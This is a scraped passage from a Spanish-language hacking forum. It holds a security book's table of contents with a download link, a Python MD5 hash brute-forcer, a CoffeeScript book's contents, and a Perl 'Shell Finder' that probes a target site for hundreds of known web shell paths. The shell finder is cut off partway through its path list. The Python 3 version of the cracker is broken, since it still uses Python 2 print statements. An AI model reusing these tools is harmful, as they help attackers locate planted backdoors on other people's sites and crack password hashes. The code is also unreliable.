What Are Kernel-Mode Rootkits? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133
Challenges Faced by Kernel-Mode Rootkits . . . . . . . . . . . . . . . . . . . . 134
Getting Loaded . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 134
Gaining Execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135
Communicating with User Mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135
Remaining Stealthy and Persistent . . . . . . . . . . . . . . . . . . . . . . . . . . . . 136
Methods and Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 136
Kernel-Mode Rootkit Samples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 156
Klog by Clandestiny . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 156
AFX by Aphex . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 160
FU and FUTo by Jamie Butler, Peter Silberman, and C.H.A.O.S . . . . 162
Shadow Walker by Sherri Sparks and Jamie Butler . . . . . . . . . . . . . . 164
He4Hook by He4 Team . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 167
Sebek by The Honeynet Project . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 170
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 171
Summary of Countermeasures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 171
▼ 5 Virtual Rootkits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173
Overview of Virtual Machine Technology . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174
Types of Virtual Machines . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174
The Hypervisor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 175
Virtualization Strategies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
Virtual Memory Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
Virtual Machine Isolation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179
xii Hacking Exposed Malware & Rootkits
Virtual Machine Rootkit Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179
Rootkits in the Matrix: How Did We Get Here?! . . . . . . . . . . . . . . . . . 179
What Is a Virtual Rootkit? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180
Types of Virtual Rootkits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 181
Detecting the Virtual Environment . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182
Escaping the Virtual Environment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
Hijacking the Hypervisor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 190
Virtual Rootkit Samples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 198
▼ 6 The Future of Rootkits: If You Think It's Bad Now... . . . . . . . . . . . . . . . . . . . . . . . . . . . 199
Increases in Complexity and Stealth . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 200
Custom Rootkits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 207
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 208
Part III Prevention Technologies
Case Study: A Wolf in Sheep's Clothing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 210
Rogue Software . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 210
Great Interface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 213
They Work! Sometimes... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 213
▼ 7 Antivirus . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 215
Now and Then: The Evolution of Antivirus Technology . . . . . . . . . . . . . . . . 216
The Virus Landscape . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 217
Defi nition of a Virus . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218
Classifi cation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218
Simple Viruses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 220
Complex Viruses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 222
Antivirus—Core Features and Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . 224
Manual or "On-Demand" Scanning . . . . . . . . . . . . . . . . . . . . . . . . . . . 224
Real-Time or "On-Access" Scanning . . . . . . . . . . . . . . . . . . . . . . . . . . . 225
Signature-Based Detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 225
Anomaly/Heuristic-Based Detection . . . . . . . . . . . . . . . . . . . . . . . . . . 227
A Critical Look at the Role of Antivirus Technology . . . . . . . . . . . . . . . . . . . 228
Where Antivirus Excels . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 228
Top Performers in the Antivirus Industry . . . . . . . . . . . . . . . . . . . . . . 229
Challenges for Antivirus . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 232
Antivirus Exposed: Is Your Antivirus Product a Rootkit? . . . . . . . . . . . . . . . 238
Patching System Services at Runtime . . . . . . . . . . . . . . . . . . . . . . . . . . 239
Hiding Threads from User Mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 241
A Bug? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 241
The Future of the Antivirus Industry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243
Fighting for Survival . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243
Contents xiii
Death of an Industry? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 244
Possible Antivirus Replacement Technologies . . . . . . . . . . . . . . . . . . . 245
Summary and Countermeasures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 247
▼ 8 Host Protection Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 249
Personal Firewall Capabilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 250
McAfee . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 251
Symantec . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 252
Checkpoint . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 254
Personal Firewall Limitations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 255
Pop-Up Blockers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 258
Internet Explorer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 258
Firefox . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 259
Opera . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 259
Safari . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 259
Chrome . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 260
Example Generic Pop-Up Blocker Code . . . . . . . . . . . . . . . . . . . . . . . . 261
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 264
▼ 9 Host-Based Intrusion Prevention . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 267
HIPS Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 268
Growing Past Intrusion Detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 271
Behavioral vs. Signature . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 272
Behavioral Based . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 273
Signature Based . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 274
Anti-Detection Evasion Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275
How Do You Detect Intent? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 279
HIPS and the Future of Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 280
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 281
▼ 10 Rootkit Detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 283
The Rootkit Author's Paradox . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 284
A Quick History . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 285
Details on Detection Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 288
System Service Descriptor Table Hooking . . . . . . . . . . . . . . . . . . . . . . 288
IRP Hooking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 289
Inline Hooking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
Interrupt Descriptor Table Hooks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
Direct Kernel Object Manipulation . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
IAT Hooking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
Windows Anti-Rootkit Features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291
Software-Based Rootkit Detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 292
Live Detection vs. Offl ine Detection . . . . . . . . . . . . . . . . . . . . . . . . . . . 293
System Virginity Verifi er . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 293
IceSword and DarkSpy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 295
xiv Hacking Exposed Malware & Rootkits
RootkitRevealer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 297
F-Secure's Blacklight . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 297
Rootkit Unhooker . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 298
GMER . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 301
Helios and Helios Lite . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 302
McAfee Rootkit Detective . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 305
Commercial Rootkit Detection Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . 306
Offl ine Detection Using Memory Analysis: The Evolution of Memory
Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 307
Virtual Rootkit Detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 316
Hardware-Based Rootkit Detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 316
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 317
▼ 11 General Security Practices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 319
End-User Education . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 320
Security Awareness Training Programs . . . . . . . . . . . . . . . . . . . . . . . . 320
Defense in Depth . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 323
System Hardening . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 324
Automatic Updates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 325
Virtualization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 325
Baked-In Security (from the Beginning) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 326
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 327
▼ Appendix System Integrity Analysis: Building Your Own Rootkit Detector . . . . . . . . . . . . . . . . . . 329
What Is System Integrity Analysis? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 331
The Two Ps of Integrity Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 333
Pointer Validation: Detecting SSDT Hooks . . . . . . . . . . . . . . . . . . . . . 335
Patch/Detour Detection in the SSDT . . . . . . . . . . . . . . . . . . . . . . . . . . 340
The Two Ps for Detecting IRP Hooks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 353
The Two Ps for Detecting IAT Hooks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 358
Our Third Technique: Detecting DKOM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 358
Sample Rootkit Detection Utility . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 366



Enlace de descarga:
Código: text
https://jumpshare.com/v/FzyTukYsWV5YHUHPxNAx
#35
Python / PyCrack
Julio 18, 2017, 11:13:54 AM

Python 2.7.5

Código: text
# PyCrack MD5 Hash Cracker
# Version 1.0.0
# Coded by BlackMan in Python 2.7.5
# Download : http://sourceforge.net/projects/md5crack/
# File     : pycrack.py

#IMPORTS
import hashlib
import os
import sys
import datetime

#GLOBAL
startTime = datetime.datetime.now()

#DEBUG MESSAGES
def action(msg)    : print '[#] - ' + msg
def alert(msg)     : print '[+] - ' + msg
def error(msg)     : print '[!] - ' + msg
def errorExit(msg) : raise SystemExit('[!] - ' + msg)

#MD5 STRING
def md5(string): return hashlib.md5(string).hexdigest()

#PERMUTATION BUILDER
def xpermutation(characters, size):
    if size == 0:
        yield []
    else:
        for x in xrange(len(characters)):
            for y in xpermutation(characters[:x] + characters[x:], size - 1):
                yield [characters[x]] + y

#BRUTE FORCE
def bruteForce(hash):
    attempt = 0
    characters = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
    maxLength = xrange(0,25)
    stringBuilder = ''
    for length in maxLength:
        for x in xpermutation(characters, length):
            permutation = stringBuilder + ''.join(x)
            attempt = attempt + 1
            if md5(permutation) == hash:
                end_time = str(datetime.datetime.now() - startTime).split('.')[0]
                print '[' + str(attempt) + '] - ' + permutation + ' - CRACKED! Took ' + end_time
                raw_input('\nPress the <ENTER> key to EXIT...')
                sys.exit()
            else:
                print '[' + str(attempt) + '] - ' + permutation
    errorExit('Failed to brute force hash.')

#START
if os.name == 'nt' : os.system('cls')
else : os.system('clear')
print ''.rjust(56, '#')
print '#' + ''.center(54) + '#'
print '# PyCrack MD5 Hash Cracker'.ljust(55) + '#'
print '# Version 1.0.0'.ljust(55) + '#'
print '# Coded by InvisibleMan in Python 2.7.5'.ljust(55) + '#'
print '# Download : http://sourceforge.net/projects/md5crack/'.ljust(55) + '#'
print '#' + ''.center(54) + '#'
print ''.rjust(56, '#')
if sys.version_info.major != 2 or sys.version_info.minor != 7:
    errorExit('Requires Python version 2.7')
if len(sys.argv) == 2:
    if len(sys.argv[1]) == 32 and sys.argv[1].isalnum():
        bruteForce(sys.argv[1])
    else:
        error('Invalid MD5 hash!')
        errorExit('Usage : crack.py [HASH]')
else:
    error('Missing command line arguments.')
    errorExit('Usage : pycrack.py [HASH]')


Python 3.3.2:

Código: text
# PyCrack MD5 Hash Cracker
# Version 1.0.0
# Coded by BlackMan in Python 3.3.2
# Download : http://sourceforge.net/projects/md5crack/
# File     : pycrack.py

#IMPORTS
import hashlib
import os
import sys
import datetime

#GLOBAL
startTime = datetime.datetime.now()

#DEBUG MESSAGES
def action(msg)    : print('[#] - ' + msg)
def alert(msg)     : print('[+] - ' + msg)
def error(msg)     : print('[!] - ' + msg)
def errorExit(msg) : raise SystemExit('[!] - ' + msg)

#MD5 STRING
def md5(string): return hashlib.md5(string.encode('utf-8')).hexdigest()

#PERMUTATION BUILDER
def xpermutation(characters, size):
    if size == 0:
        yield []
    else:
        for x in range(len(characters)):
            for y in xpermutation(characters[:x] + characters[x:], size - 1):
                yield [characters[x]] + y

#BRUTE FORCE
def bruteForce(hash):
    attempt = 0
    characters = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
    maxLength = range(0,25)
    stringBuilder = ''
    for length in maxLength:
        for x in xpermutation(characters, length):
            permutation = stringBuilder + ''.join(x)
            attempt = attempt + 1
            if md5(permutation) == hash:
                end_time = str(datetime.datetime.now() - startTime).split('.')[0]
                print('[' + str(attempt) + '] - ' + permutation + ' - CRACKED! Took ' + end_time)
                input('\nPress the <ENTER> key to EXIT...')
                sys.exit()
            else:
                print('[' + str(attempt) + '] - ' + permutation)
    errorExit('Failed to brute force hash.')

#START
if os.name == 'nt' : os.system('cls')
else : os.system('clear')
print ''.rjust(56, '#')
print '#' + ''.center(54) + '#'
print '# PyCrack MD5 Hash Cracker'.ljust(55) + '#'
print '# Version 1.0.0'.ljust(55) + '#'
print '# Coded by InvisibleMan in Python 3.3.2'.ljust(55) + '#'
print '# Download : http://sourceforge.net/projects/md5crack/'.ljust(55) + '#'
print '#' + ''.center(54) + '#'
print ''.rjust(56, '#')
if sys.version_info.major != 3 or sys.version_info.minor != 3:
    errorExit('Requires Python version 3.3')
if len(sys.argv) == 2:
    if len(sys.argv[1]) == 32 and sys.argv[1].isalnum():
        bruteForce(sys.argv[1])
    else:
        error('Invalid MD5 hash!')
        errorExit('Usage : pycrack.py [HASH]')
else:
    error('Missing command line arguments.')
    errorExit('Usage : pycrack.py [HASH]')
#36
Cursos, manuales y libros / CoffeScript Book
Julio 18, 2017, 11:11:14 AM

Código: text
Getting Started . . . . . . . . . . . . 1
1.1 Installing CoffeeScript 1
1.2 Text Editors for CoffeeScript 5
1.3 Meet 'coffee' 6
1.4 Debugging CoffeeScript 9
2. Functions, Scope, and Context . . . . . . . 13
2.1 Functions 101 13
2.2 Scope: Where You See 'Em 18
2.3 Context (or, "What Is 'this'?") 21
2.4 Property Arguments (@arg) 24
2.5 Default Arguments (arg =) 25
2.6 Splats (...) 28
2.7 Project: 5x5 Input Parser 29
2.9 Exercises 34
3. Collections and Iteration . . . . . . . . . 37
3.1 Objects as Hashes 37
3.2 Arrays 40
3.3 Iterating over Collections 43
3.4 Conditional Iteration 46
3.5 Comprehensions 47
3.6 Pattern Matching (or, Destructuring Assignment) 48
3.7 Project: 5x5 Solitaire 50
3.9 Exercises 56
4. Modules and Classes . . . . . . . . . . 59
4.1 Modules: Splitting Up Apps 60
4.2 The Power of Prototypes 61
4.3 Classes: Functions with Prototypes 63
4.4 Inheritance with 'extends' 65
4.5 Project: Refactoring 5x5 68
4.7 Exercises 72
5. Web Interactivity with jQuery . . . . . . . . 75
5.1 The Tao of jQuery 76
5.2 Manipulating the DOM 76
5.3 Getting Selective 77
5.4 Reacting to Events 79
5.5 Project: Browser-Based 5x5 80
5.7 Exercises 88
6. Server-Side Apps with Node.js . . . . . . . . 91
6.1 What Is Node.js? 91
6.2 Modularizing Code with 'exports' and 'require' 92
6.3 Thinking Asynchronously 93
6.4 Project: Multiplayer 5x5 97
6.6 Exercises 105
A1. Answers to Exercises . . . . . . . . . 107
A1.1 Functions, Scope, and Context 107
A1.2 Collections and Iteration 109
A1.3 Modules and Classes 111
A1.4 Web Interactivity with jQuery 112
A1.5 Server-Side Apps with Node.js 113
A2. Ways of Running CoffeeScript . . . . . . . 115
A2.1 Web Consoles 115
A2.2 Running CoffeeScript in Your Web App 116
A2.3 CoffeeScript on Rails 116
A2.4 CoffeeScript via Middleware 117
A2.5 CoffeeScript on Node.js 117
A2.6 Rapid Websites with Middleman 118
A2.7 CoffeeScript for System Scripts 119
A3. Cheat Sheet for JavaScripters . . . . . . . 121
A3.1 Boolean Operators 121
A3.2 The Existential Operator 121
A3.3 Context and Prototype Accessors 122
A3.4 Function Definitions 122
A3.5 Conditionals 122
A3.6 Property Existence 122
A3.7 Iteration 123



Enlace de descarga:
Código: text
https://jumpshare.com/v/K3JcN0eIWFUsswYUATZS
#37
Perl / Perl - Other shell finder
Julio 18, 2017, 11:09:15 AM

Código: text
#!usr/bin/perl

use LWP::UserAgent;
use Term::ANSIColor;
use HTTP::Request;


inicio:
$sis="$^O";if ($sis eq linux){ $cmd="clear";} else { $cmd="cls"; }
system("$cmd");
system("Title Shell Finder v1.0");
print color("bold red"),"\t##################################################\n";
print "\t#                                                #\n";
print "\t#               /.Shell Finder v1.0              #\n";
print "\t#          /.Coded By D3V1L \(ArdKing)\            #\n";
print "\t#    /.Greetz to all albanian coders/hackers     #\n";
print "\t#             /.FB : fb.com/d3v1lal              #\n";
print "\t#               /.ICQ : 693904949                #\n";
print "\t#                                                #\n";
print "\t##################################################\n";
print color 'reset';


sleep(1);
print color("bold red"),"\n\nURL \(ex. site.com/)\ : ";
print color 'reset';
print color("green"); $h0st = <STDIN>;
print color 'reset';


chomp($h0st);
if($host !~ /http:\/\//) {
  $h0st = "http://$h0st";
}


print color("bold red"),"\n\n \[+]\ Starting scan\n\n";print color 'reset';

@shell = ("WSO.php","dz.php","DZ.php","cpanel.php","cpn.php","sos.php","term.php","Sec-War.php","sql.php","b374.php","ssl.php","mysql.php","WolF.php","madspot.php",
"Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","/libraries/imi.php","/libraries/wso.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
"vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
"d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","info.php","egyshell.php","Sym.php","c22.php","c100.php",
"wp-content/plugins/akismet/admin.php#","configuration.php","g.php","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
"wp-content/plugins/akismet/widget.php#","xx.pl","ls.php","Cpanel.php","k.php","/libraries/legacy/log/v_5.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
"tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
"tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","0day.php","tmp/admin.php","cliente/downloads/h4xor.php",
"whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
"templates/rhuk_milkyway/index.php","templates/beez/index.php","sado.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
"admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","sniper.php","administration/Sym.php","images/Sym.php",
"/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","gzaa_spysl","sql-new.php","/shell.php","/sa.php","/admin.php",
"/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
"/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
"/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
"/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","r00t-s3c.php","c.php","/backup.sql","/back.sql","/data.sql","wp.rar/",
"wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
"tmp/killer.php","whmcs.php","abuhlail.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
"tmp/d0maine.php","d0maine.php","tmp/sql.php","X.php","123.php","m.php","b.php","up.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
"forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
"spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
"Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
"tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
"/wp-content/plugins/count-per-day/js/yc/d00.php","bluff.php","king.jeen","admins/","admins.asp","admins.php","wp.zip","/wp-content/plugins/disqus-comment-system/WSO.php",
"/wp-content/plugins/disqus-comment-system/dz.php",
"/wp-content/plugins/disqus-comment-system/DZ.php",
"/wp-content/plugins/disqus-comment-system/cpanel.php",
"/wp-content/plugins/disqus-comment-system/cpn.php",
"/wp-content/plugins/disqus-comment-system/sos.php",
"/wp-content/plugins/disqus-comment-system/term.php",
"/wp-content/plugins/disqus-comment-system/Sec-War.php",
"/wp-content/plugins/disqus-comment-system/sql.php",
"/wp-content/plugins/disqus-comment-system/ssl.php",
"/wp-content/plugins/disqus-comment-system/mysql.php",
"/wp-content/plugins/disqus-comment-system/WolF.php",
"/wp-content/plugins/disqus-comment-system/madspot.php",
"/wp-content/plugins/disqus-comment-system/Cgishell.pl",
"/wp-content/plugins/disqus-comment-system/killer.php",
"/wp-content/plugins/disqus-comment-system/changeall.php",
"/wp-content/plugins/disqus-comment-system/2.php",
"/wp-content/plugins/disqus-comment-system/Sh3ll.php",
"/wp-content/plugins/disqus-comment-system/dz0.php",
"/wp-content/plugins/disqus-comment-system/dam.php",
"/wp-content/plugins/disqus-comment-system/user.php",
"/wp-content/plugins/disqus-comment-system/dom.php",
"/wp-content/plugins/disqus-comment-system/whmcs.php",
"/wp-content/plugins/disqus-comment-system/vb.zip",
"/wp-content/plugins/disqus-comment-system/r00t.php",
"/wp-content/plugins/disqus-comment-system/c99.php",
"/wp-content/plugins/disqus-comment-system/gaza.php",
"/wp-content/plugins/disqus-comment-system/1.php",
"/wp-content/plugins/disqus-comment-system/d0mains.php",
"/wp-content/plugins/disqus-comment-system/madspotshell.php",
"/wp-content/plugins/disqus-comment-system/info.php",
"/wp-content/plugins/disqus-comment-system/egyshell.php",
"/wp-content/plugins/disqus-comment-system/Sym.php",
"/wp-content/plugins/disqus-comment-system/c22.php",
"/wp-content/plugins/disqus-comment-system/c100.php",
"/wp-content/plugins/disqus-comment-system/configuration.php",
"/wp-content/plugins/disqus-comment-system/g.php",
"/wp-content/plugins/disqus-comment-system/xx.pl",
"/wp-content/plugins/disqus-comment-system/ls.php",
"/wp-content/plugins/disqus-comment-system/Cpanel.php",
"/wp-content/plugins/disqus-comment-system/k.php",
"/wp-content/plugins/disqus-comment-system/zone-h.php",
"/wp-content/plugins/disqus-comment-system/tmp/user.php",
"/wp-content/plugins/disqus-comment-system/tmp/Sym.php",
"/wp-content/plugins/disqus-comment-system/cp.php",
"/wp-content/plugins/disqus-comment-system/tmp/madspotshell.php",
"/wp-content/plugins/disqus-comment-system/tmp/root.php",
"/wp-content/plugins/disqus-comment-system/tmp/whmcs.php",
"/wp-content/plugins/disqus-comment-system/tmp/index.php",
"/wp-content/plugins/disqus-comment-system/tmp/2.php",
"/wp-content/plugins/disqus-comment-system/tmp/dz.php",
"/wp-content/plugins/disqus-comment-system/tmp/cpn.php",
"/wp-content/plugins/disqus-comment-system/tmp/changeall.php",
"/wp-content/plugins/disqus-comment-system/tmp/Cgishell.pl",
"/wp-content/plugins/disqus-comment-system/tmp/sql.php",
"/wp-content/plugins/disqus-comment-system/0day.php",
"/wp-content/plugins/disqus-comment-system/tmp/admin.php",
"/wp-content/plugins/disqus-comment-system/L3b.php",
"/wp-content/plugins/disqus-comment-system/d.php",
"/wp-content/plugins/disqus-comment-system/tmp/d.php",
"/wp-content/plugins/disqus-comment-system/tmp/L3b.php",
"/wp-content/plugins/disqus-comment-system/sado.php",
"/wp-content/plugins/disqus-comment-system/admin1.php",
"/wp-content/plugins/disqus-comment-system/upload.php",
"/wp-content/plugins/disqus-comment-system/up.php",
"/wp-content/plugins/disqus-comment-system/vb.zip",
"/wp-content/plugins/disqus-comment-system/vb.rar",
"/wp-content/plugins/disqus-comment-system/admin2.asp",
"/wp-content/plugins/disqus-comment-system/uploads.php",
"/wp-content/plugins/disqus-comment-system/sa.php",
"/wp-content/plugins/disqus-comment-system/sysadmins/",
"/wp-content/plugins/disqus-comment-system/admin1/",
"/wp-content/plugins/disqus-comment-system/sniper.php",
"/wp-content/plugins/disqus-comment-system/images/Sym.php",
"/wp-content/plugins/disqus-comment-system//r57.php",
"/wp-content/plugins/disqus-comment-system/gzaa_spysl",
"/wp-content/plugins/disqus-comment-system/sql-new.php",
"/wp-content/plugins/disqus-comment-system//shell.php",
"/wp-content/plugins/disqus-comment-system//sa.php",
"/wp-content/plugins/disqus-comment-system//admin.php",
"/wp-content/plugins/disqus-comment-system//sa2.php",
"/wp-content/plugins/disqus-comment-system//2.php",
